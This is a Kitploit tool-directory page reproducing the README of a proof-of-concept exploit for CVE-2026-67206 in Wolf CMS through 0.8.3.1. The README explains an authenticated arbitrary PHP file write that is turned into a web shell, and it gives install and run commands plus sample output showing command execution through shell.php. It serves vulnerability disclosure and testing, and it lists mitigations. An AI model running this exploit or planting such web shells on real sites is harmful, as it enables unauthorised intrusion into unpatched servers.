Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-67206 — PoC exploit for Wolf CMS <= 0.8.3.1: authenticates to Admin, writes an arbitrary PHP file to /public via FileManagerController, and executes commands through a web shell. | Kitploit
Tools/GitHubGitHub/anirbala98/cve-2026-67206
ExploitationWeb Application ExploitationPost-ExploitationPenetration TestingLearning & EducationPayload Development
GitHubanirbala98/cve-2026-67206

CVE-2026-67206

PoC exploit for Wolf CMS <= 0.8.3.1: authenticates to Admin, writes an arbitrary PHP file to /public via FileManagerController, and executes commands through a web shell.

View Repository
1321 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - RCE via Arbitrary File Write

This repo contains a Proof of Concept(PoC) exploit for CVE-2026-67206

Disclaimer

This project is provided for educational purposes and authorized security testing only. Do not use it against systems that you do not own or have permission to test.

Overview

An arbitrary file write vulnerability exists in Wolf CMS versions through 0.8.3.1. It allows an authenticated attacker to write malicious arbitrary files to /public directory of web root via create_file() and save() functions of FileManagerController.php. The create_file() function of FileManagerController.php does not validate file extensions, thereby allowing authenticated attackers to write malicious PHP scripts and gain remote code execution privileges.

A detailed writeup with source code analysis and exploit demonstration can be found on my Medium blog.

Affected Version

All versions of Wolf CMS through 0.8.3.1 are affected. The Wolf CMS repository has been archived as of Aug 28, 2021 and is no longer actively maintained. No patches currently exist for this vulnerability.

Requirements

  • Python 3.13.14
  • Requests 2.32.5
  • Beautifulsoup4 4.15.0

Installation

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt

Usage

root@kitploit:~
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin

Example

root@kitploit:~
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K 
[*] Logging in with provided credentials...
[+] Login successful

[*] Creating a file named shell.php...
[+] File creation successful

[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data

Mitigation

  • Validate extensions of files created by authenticated users based on an allowlist
  • Disallow extensions like .php, .phtml, .phar, .php5 etc, unless otherwise necessary
  • Disallow PHP execution in upload directories of web server root
  • Save created files on a different server if possible to minimize impact

References

  • https://www.tenable.com/cve/CVE-2026-67206
  • https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-67206-0ad3ae08bc78
Download Tool